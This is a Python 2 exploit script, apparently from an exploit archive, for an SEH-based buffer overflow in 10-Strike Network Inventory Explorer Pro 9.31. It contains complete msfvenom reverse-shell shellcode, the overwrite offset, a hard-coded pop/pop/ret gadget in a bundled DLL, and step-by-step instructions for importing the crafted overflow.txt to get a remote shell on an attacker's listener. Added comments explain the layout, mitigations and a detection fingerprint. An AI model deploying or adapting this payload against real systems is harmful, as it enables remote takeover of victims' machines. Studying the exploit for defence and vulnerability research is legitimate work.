## https://sploitus.com/exploit?id=PACKETSTORM:164739
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - Buffer Overflow (SEH)  
# Date: 2021-10-31  
# Exploit Author: ro0k  
# Vendor Homepage: https://www.10-strike.com/  
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe  
# Version: 9.31  
# Tested on: Windows 10 x64 Education 21H1 Build 19043.928   
  
# Proof of Concept:  
# 1.Run python2 exploit.py to generate overflow.txt  
# 2.Transfer overflow.txt to the Windows 10 machine  
# 3.Setup Netcat listener on attacker machine   
# 4.Open 10-Strike Network Inventory Explorer Pro  
# 5.Select Computers tab from the uppermost set of tabs  
# 6.Select From Text File option  
# 7.Open overflow.txt  
# 8.Receive reverse shell connection on attacker machine!   
  
#!/usr/bin/env python  
import struct  
  
# Generates overflow.txt, the file the PoC steps above import through the
# "From Text File" option. In file order the buffer is:
#   junk (209 x "A") | nseh (4) | seh (4) | sub esp,0x10 (3) | shellcode
# junk + nseh is exactly `offset` (213) bytes, so the 4-byte SEH handler
# pointer that follows is what the fixed address in `seh` overwrites.
# Written for Python 2 (the PoC says python2): there chr() yields a byte
# string and "w" mode writes it unchanged.

# Full byte range minus the bad characters below. It is assigned but never
# referenced afterwards; presumably the bad-character test string left over
# from analysis — safe to delete.
charslist = ""
# Bytes excluded from the payload (NUL, TAB, LF, CR, ':', '\').  They match
# the -b list in the msfvenom comment below; why the import parser rejects
# them is not shown here.
badchars = [0x00,0x09,0x0a,0x0d,0x3a,0x5c]

for i in range (0x00, 0xFF+1):
    if i not in badchars:
        charslist += chr(i)

# Encoded reverse-shell stage; LHOST/LPORT are the original author's lab
# values.  The only constraint the encoder was given is the bad-character
# list above.
#msfvenom -p windows/shell_reverse_tcp LHOST=10.2.170.242 LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00\x09\x0a\x0d\x3a\x5c"
shellcode = ("\xd9\xc8\xd9\x74\x24\xf4\x58\x33\xc9\xbb\xc6\xbc\xd3\x19\xb1"
"\x52\x83\xc0\x04\x31\x58\x13\x03\x9e\xaf\x31\xec\xe2\x38\x37"
"\x0f\x1a\xb9\x58\x99\xff\x88\x58\xfd\x74\xba\x68\x75\xd8\x37"
"\x02\xdb\xc8\xcc\x66\xf4\xff\x65\xcc\x22\xce\x76\x7d\x16\x51"
"\xf5\x7c\x4b\xb1\xc4\x4e\x9e\xb0\x01\xb2\x53\xe0\xda\xb8\xc6"
"\x14\x6e\xf4\xda\x9f\x3c\x18\x5b\x7c\xf4\x1b\x4a\xd3\x8e\x45"
"\x4c\xd2\x43\xfe\xc5\xcc\x80\x3b\x9f\x67\x72\xb7\x1e\xa1\x4a"
"\x38\x8c\x8c\x62\xcb\xcc\xc9\x45\x34\xbb\x23\xb6\xc9\xbc\xf0"
"\xc4\x15\x48\xe2\x6f\xdd\xea\xce\x8e\x32\x6c\x85\x9d\xff\xfa"
"\xc1\x81\xfe\x2f\x7a\xbd\x8b\xd1\xac\x37\xcf\xf5\x68\x13\x8b"
"\x94\x29\xf9\x7a\xa8\x29\xa2\x23\x0c\x22\x4f\x37\x3d\x69\x18"
"\xf4\x0c\x91\xd8\x92\x07\xe2\xea\x3d\xbc\x6c\x47\xb5\x1a\x6b"
"\xa8\xec\xdb\xe3\x57\x0f\x1c\x2a\x9c\x5b\x4c\x44\x35\xe4\x07"
"\x94\xba\x31\x87\xc4\x14\xea\x68\xb4\xd4\x5a\x01\xde\xda\x85"
"\x31\xe1\x30\xae\xd8\x18\xd3\xdb\x1e\x88\xd1\xb4\x1c\xcc\x14"
"\xfe\xa8\x2a\x7c\x10\xfd\xe5\xe9\x89\xa4\x7d\x8b\x56\x73\xf8"
"\x8b\xdd\x70\xfd\x42\x16\xfc\xed\x33\xd6\x4b\x4f\x95\xe9\x61"
"\xe7\x79\x7b\xee\xf7\xf4\x60\xb9\xa0\x51\x56\xb0\x24\x4c\xc1"
"\x6a\x5a\x8d\x97\x55\xde\x4a\x64\x5b\xdf\x1f\xd0\x7f\xcf\xd9"
"\xd9\x3b\xbb\xb5\x8f\x95\x15\x70\x66\x54\xcf\x2a\xd5\x3e\x87"
"\xab\x15\x81\xd1\xb3\x73\x77\x3d\x05\x2a\xce\x42\xaa\xba\xc6"
"\x3b\xd6\x5a\x28\x96\x52\x7a\xcb\x32\xaf\x13\x52\xd7\x12\x7e"
"\x65\x02\x50\x87\xe6\xa6\x29\x7c\xf6\xc3\x2c\x38\xb0\x38\x5d"
"\x51\x55\x3e\xf2\x52\x7c")

# Distance from the start of the imported line to the SEH handler pointer,
# recovered from the cyclic pattern found in the handler slot at crash time.
#pattern_offset.rb -l 250 +q 41316841
offset = 213

# Next-SEH slot: a short forward jump (plus two NOPs of padding), per the
# nasm comment.
#nasm > jmp short 8
nseh = "\xeb\x06\x90\x90"
junk = "A" * (offset - len(nseh))

# Handler pointer: a pop/pop/ret gadget in the bundled sqlite3.dll.  The note
# below records that this module ships without ASLR, Rebase or SafeSEH, which
# is why a hard-coded address is usable at all.  Mitigation is on the
# vendor/deployment side: a SafeSEH- and ASLR-enabled build of that DLL, or
# enabling SEHOP, invalidates this handler overwrite; the missing length
# check on the imported line is the underlying bug.
#0x61e012f6 : pop edi # pop ebp # ret | {PAGE_EXECUTE_READ} [sqlite3.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.12.2 (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\sqlite3.dll)
seh = struct.pack("<I", 0x61e012f6)

# Three-byte stack adjustment placed right where nseh's jump lands (per the
# metasm comment); presumably moves esp clear of the shellcode — confirm.
#metasm > sub esp,0x10
subesp10="\x83\xec\x10"
payload = shellcode

buffer = junk + nseh + seh + subesp10 + payload

# Detection note: a "computer list" import file containing a single line with
# a ~200-byte run of "A" followed by non-printable bytes is the fingerprint
# of this file; legitimate lists hold hostnames/addresses.
# Open/close without a context manager, as in the original; Python 2 text
# mode writes the str bytes verbatim.
f = open("overflow.txt", "w")
f.write(buffer)
f.close()